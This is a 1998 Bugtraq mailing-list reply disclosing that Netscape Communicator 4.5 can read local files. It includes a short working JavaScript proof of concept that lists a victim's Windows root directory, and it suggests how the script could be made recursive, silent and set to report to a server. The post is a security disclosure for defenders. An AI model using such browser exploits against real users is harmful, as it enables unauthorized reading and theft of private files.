Bugtraq mailing list archives

Re: Netscape Communicator 4.5 can read local files

From: haddock () UDEL EDU (Terence Christopher Haddock)
Date: Wed, 25 Nov 1998 15:28:45 -0500

        This security hole is not limited to knowing a specific file name,
it can be used to list the contents of a directory, which I believe is
much more insidious. This script can send a list of the files in the
user's root directory under windows:

sl=window.open("wysiwyg://1/file://C|/");
sl2=sl.window.open();
sl2.location="javascript:"+
"b=\"Here is the files in your root directory:\";"+
"var f=new java.io.file(\"C:\\\\\");"+
"var files=f.list();"+
"for (var x=0;x<files.length;x++){"+
"b+=files[x]+\"\n\""+
"};"+
"alert(b);";

        (Simple to modify it for UNIX)
        Using a search algorithm the script could search for specific
files by running this recursively. The only problem (from a hacker's
perspective, a good thing from our perspective) is all of the windows it
would open. If a way could be worked around this (which I think it can),
this script could run without a user even knowing it, searching the user's
directories and reporting them to a server.

Sincerely,
Terence C. Haddock